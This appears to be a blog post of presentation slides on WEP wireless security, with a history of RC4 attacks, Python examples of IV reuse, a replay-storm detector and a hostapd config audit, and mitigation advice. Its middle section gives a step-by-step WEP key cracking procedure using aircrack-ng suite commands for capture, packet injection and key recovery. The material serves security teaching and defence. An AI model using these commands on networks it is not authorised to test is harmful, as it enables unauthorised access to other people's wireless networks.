This material is to provide information on WLAN
security risks and mitigation measures. It should not
be used for malicious intent. Unauthorized access to a
computer system is an offense.
The points made here are kept concise for the
purpose of presentation. If you require details of the tests
and implementation please refer to technical
History of WEP Cracking
• In 2001:
– RC4 stream cipher weakness discovered by Scott Fluhrer, Itsik Mantin, and Adi Shamir
– Secret key can be recovered by collecting 4-6 million data packets → very busy network
– Known as the FMS attack
• In 2004:
– Hacker KoReK improved the attack
– Collecting 0.5 to 2 million data packets → busy network
– Known as the KoReK attack
• In 2005:
– Another weakness of the RC4 stream cipher in the WEP implementation discovered by Andreas Klein
– Collects fewer data packets → normal wireless LAN traffic
– The PTW attack is based on Klein’s idea
– Known as the PTW attack
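The three attacks above all start from the same design flaw: WEP prepends a 24-bit IV, sent in clear, to a static secret key and feeds that directly to RC4. The following Python is an added illustration (not code from the original slides) of why that keying is weak. It implements textbook RC4, a WEP-style frame (IV || key, ICV omitted), shows that two frames under one IV leak the XOR of their plaintexts, and applies the birthday bound to the 24-bit IV space. The key, IV and plaintexts are constructed sample values.

```python
"""Why WEP's keying is weak: a 24-bit IV sent in clear is prepended to a
static secret key to form each frame's RC4 key, so the IV space is tiny and
keystreams repeat. Added illustration; not code from the original slides.
The WEP key, IV and plaintexts below are constructed sample values."""
import math
from typing import Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling (KSA), then the PRGA keystream XORed over data."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv: bytes, wep_key: bytes, plaintext: bytes) -> bytes:
    """WEP-style frame body: 3-byte IV in clear, then RC4(IV || key) over the
    payload. The CRC-32 integrity value (ICV) is omitted to keep the focus on keying."""
    if len(iv) != 3 or len(wep_key) not in (5, 13):   # WEP-40 / WEP-104
        raise ValueError("IV must be 3 bytes and key 5 or 13 bytes")
    return iv + rc4(iv + wep_key, plaintext)


def keystream_reuse_leak(frame_a: bytes, frame_b: bytes) -> Optional[bytes]:
    """Two frames encrypted under the same IV use the same RC4 keystream, so
    C_a XOR C_b == P_a XOR P_b: the encryption cancels out. Returns that XOR,
    or None when the IVs differ (no direct leak)."""
    if frame_a[:3] != frame_b[:3]:
        return None
    return bytes(a ^ b for a, b in zip(frame_a[3:], frame_b[3:]))


def frames_until_iv_collision(p: float = 0.5, iv_bits: int = 24) -> float:
    """Birthday bound: number of frames after which a repeated IV occurs with
    probability p when IVs are drawn uniformly at random."""
    n = 2 ** iv_bits
    return math.sqrt(2 * n * math.log(1 / (1 - p)))


def hours_to_exhaust_iv_space(frames_per_second: float, iv_bits: int = 24) -> float:
    """A sequential IV counter wraps (and keystreams start repeating) after 2**iv_bits frames."""
    return 2 ** iv_bits / frames_per_second / 3600


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")     # constructed WEP-40 key
    iv = b"\x11\x22\x33"                  # constructed IV, reused on purpose
    a = wep_encrypt(iv, key, b"ARP request to gateway ")
    b = wep_encrypt(iv, key, b"DHCP discover broadcast")
    print("IV reuse leaks P_a XOR P_b:", keystream_reuse_leak(a, b).hex())
    print("frames for a 50% chance of a repeated IV:", round(frames_until_iv_collision()))
    print("hours until a counter IV wraps at 500 frames/s:",
          round(hours_to_exhaust_iv_space(500), 1))
```

The packet counts the slide quotes (millions for FMS, hundreds of thousands for KoReK) are what the statistical key-recovery attacks need; the birthday figure shows that even a randomly chosen IV repeats after only a few thousand frames, and a counter IV at a few hundred frames per second wraps within a working day, so keystream reuse is guaranteed on any busy WEP network regardless of key length.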

WEP Key Cracking Steps
1. Setup Equipment
2. Find the target
3. Capture Data from Air
4. Wait – Make the Target Network Busy
5. Start Cracking from Captured Data
Setup Equipment
• Computer
• Wireless LAN card that supports
– Monitor mode
– Packet injection
• Software
– Commercial tools available on the Win32 platform
– Free tools on Linux
• BackTrack CD
Wireless LAN Card
• Atheros chipset
– Supports Windows & Linux
• List of cards with Atheros chipset

Capture Data from Air
• airmon-ng start wifi0 [channel #]
• wlanconfig ath0 destroy
• ifconfig ath1 up
• iwconfig ath1 mode Monitor channel [channel #]
• airodump-ng -c [channel #] --bssid [BSSID] --ivs -w cap ath1
Make the Target Network Busy
• aireplay-ng -1 0 -e [SSID] -a [BSSID] -h [Wifi Card Mac Addr] ath1
• aireplay-ng -5 -b [BSSID] -h [Wifi Card Mac Addr] ath1
• Wait … …
– Wait for a useful data packet for replay later
• packetforge-ng -0 -a [BSSID] -h [Wifi Card Mac Addr] -k [dest IP] -l [source IP] -y frag*.xor -w arp-request
• aireplay-ng -2 -r arp-request ath1
Start Cracking from Captured Data
• aircrack-ng -n 64 -b [BSSID] cap.ivs
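From the defender's side, the "make the network busy" step of the procedure above has a recognisable signature: a single station replaying one captured frame produces a flood of encrypted data frames of one fixed size, which organic traffic never does. The following Python is an added example of a wireless IDS check for that pattern; it is not part of the original slides. The frame record layout, the thresholds and the sample capture (one ordinary client plus one replaying station) are constructed assumptions.

```python
"""Detection side of the procedure above: a replayed ARP request produces a flood
of encrypted data frames of one fixed size from a single transmitter, which is
unlike organic traffic. Added example with constructed frame records; it is not
part of the original slides. Field names and thresholds are my own choices."""
from collections import Counter, defaultdict, deque
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Frame:
    ts: float      # capture timestamp, seconds
    src: str       # transmitter MAC address
    bssid: str     # BSSID the frame is sent to
    kind: str      # "data", "auth", "deauth", ...
    length: int    # frame length in bytes


def detect_replay_storm(frames: List[Frame], window_s: float = 10.0,
                        min_frames: int = 200, same_size_ratio: float = 0.9) -> List[Dict]:
    """Alert once per (src, bssid) when at least min_frames data frames fall in a
    sliding window_s window and at least same_size_ratio of them share one length.
    Organic traffic mixes sizes (ACKs, web pages, DNS); a replay loop does not."""
    alerts: List[Dict] = []
    windows = defaultdict(deque)      # (src, bssid) -> recent data frames
    alerted = set()
    for f in sorted(frames, key=lambda x: x.ts):
        if f.kind != "data":
            continue
        key = (f.src, f.bssid)
        if key in alerted:
            continue
        q = windows[key]
        q.append(f)
        while q and f.ts - q[0].ts > window_s:   # drop frames outside the window
            q.popleft()
        if len(q) < min_frames:
            continue
        length, count = Counter(x.length for x in q).most_common(1)[0]
        if count / len(q) >= same_size_ratio:
            alerts.append({"src": f.src, "bssid": f.bssid, "length": length,
                           "count": count, "first_ts": q[0].ts, "last_ts": f.ts})
            alerted.add(key)
    return alerts


def build_sample() -> List[Frame]:
    """Constructed capture: one legitimate client with mixed frame sizes at 5 frames/s,
    one station replaying a fixed-size 68-byte frame at 100 frames/s."""
    bssid = "02:00:00:00:00:01"              # constructed AP address
    frames: List[Frame] = []
    sizes = [98, 1500, 120, 300, 66]
    for i in range(300):                     # 60 s of ordinary traffic
        frames.append(Frame(i * 0.2, "02:00:00:00:00:10", bssid, "data", sizes[i % len(sizes)]))
    frames.append(Frame(20.0, "02:00:00:00:00:99", bssid, "auth", 30))
    for i in range(400):                     # 4 s of replayed frames
        frames.append(Frame(20.5 + i * 0.01, "02:00:00:00:00:99", bssid, "data", 68))
    return frames


if __name__ == "__main__":
    for alert in detect_replay_storm(build_sample()):
        print(f"replay storm: {alert['count']} x {alert['length']}-byte frames "
              f"from {alert['src']} between t={alert['first_ts']:.2f}s and t={alert['last_ts']:.2f}s")
```

The check keys on frame length rather than content because the payload is encrypted; a station that authenticates and then emits hundreds of identical-length frames in seconds is worth an alert on any WEP network that is still in service, and the same logic applies to deauthentication floods by changing the frame kind it counts.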

Mitigation
• In Home & Small Scale Environment
– Using WPA/WPA2-PSK
– Good password
• Password cracking for WPA/WPA2-PSK is
• Encryption Methods in WPA/WPA2
– TKIP: using RC4
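The advice on this slide (move to WPA/WPA2-PSK, avoid the RC4-based TKIP mode, choose a good password) can be checked mechanically on an access point configuration. The following Python is an added example, not from the original slides, that audits a hostapd.conf-style file for WEP keys, WPA1/TKIP and a weak pre-shared key. The hostapd option names (wep_key0, wep_default_key, wpa, wpa_key_mgmt, wpa_pairwise, rsn_pairwise, wpa_passphrase, wpa_psk) are real; the three sample configurations are constructed and the passphrase strength rule is my own heuristic.

```python
"""Checks a hostapd.conf-style configuration for the settings this slide advises
against (WEP, WPA1/TKIP, weak pre-shared key). Added example, not from the original
slides; the hostapd option names are real, the sample configs are constructed and
the passphrase heuristic is my own rule of thumb."""
from typing import Dict, List


def parse_hostapd(text: str) -> Dict[str, str]:
    """Minimal key=value parser; '#' starts a comment, later keys override earlier ones."""
    cfg: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if "=" in line:
            k, v = line.split("=", 1)
            cfg[k.strip()] = v.strip()
    return cfg


def passphrase_is_weak(pw: str) -> bool:
    """Heuristic: shorter than 20 characters or fewer than three character classes.
    A captured 4-way handshake allows offline guessing, so the PSK must resist dictionaries."""
    classes = sum(bool(s) for s in (any(c.islower() for c in pw), any(c.isupper() for c in pw),
                                    any(c.isdigit() for c in pw), any(not c.isalnum() for c in pw)))
    return len(pw) < 20 or classes < 3


def audit_wlan_config(text: str) -> List[str]:
    """Return a list of findings; an empty list means the config passes these checks."""
    cfg = parse_hostapd(text)
    findings: List[str] = []
    if "wep_default_key" in cfg or any(k.startswith("wep_key") for k in cfg):
        findings.append("WEP keys configured: RC4 with 24-bit IVs, key recoverable from captured traffic")
    wpa = cfg.get("wpa")
    if wpa is None:
        findings.append("wpa is not set: no WPA/WPA2 protection (open or WEP network)")
    elif wpa in ("1", "3"):
        findings.append(f"wpa={wpa} enables WPA1 (TKIP/RC4); set wpa=2")
    for opt in ("wpa_pairwise", "rsn_pairwise"):
        if "TKIP" in cfg.get(opt, "").split():
            findings.append(f"{opt} allows TKIP; use CCMP only")
    if wpa is not None and "WPA-PSK" in cfg.get("wpa_key_mgmt", "").split():
        pw = cfg.get("wpa_passphrase")
        if pw is None:
            if "wpa_psk" not in cfg:
                findings.append("WPA-PSK selected but no wpa_passphrase or wpa_psk given")
        elif not 8 <= len(pw) <= 63:
            findings.append("wpa_passphrase must be 8-63 characters")
        elif passphrase_is_weak(pw):
            findings.append("wpa_passphrase is short or low-entropy; use a long mixed-character passphrase")
    return findings


# Constructed sample configurations
WEP_CONF = """\
interface=wlan0
ssid=demo-wep
wep_default_key=0
wep_key0=0102030405
"""

WPA1_TKIP_CONF = """\
interface=wlan0
ssid=demo-wpa
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=password1
"""

HARDENED_CONF = """\
interface=wlan0
ssid=demo-wpa2
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=Correct-Horse-Battery-7-Staple-Rain
"""

if __name__ == "__main__":
    for name, conf in (("WEP", WEP_CONF), ("WPA1/TKIP", WPA1_TKIP_CONF), ("hardened", HARDENED_CONF)):
        print(name, "->", audit_wlan_config(conf) or ["no findings"])
```

The hardened sample keeps only WPA2 (wpa=2) with CCMP and a long passphrase; the passphrase rule is deliberately strict because, unlike WEP, the remaining attack on WPA2-PSK is offline guessing against a captured handshake, so the passphrase is the whole defence.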

5 thoughts on “WEP Key Cracking Demo”

1. Right now hacking WEP passwords and shared keys is common, and I think this is the right time to make people aware so they make their wireless secure and make it a little harder for the bad guys to break in. What do you think Jasmin?

2. It appears like WordPress is the top blogging platform out there right now (from what I’ve read). Is that what you are using on your blog?
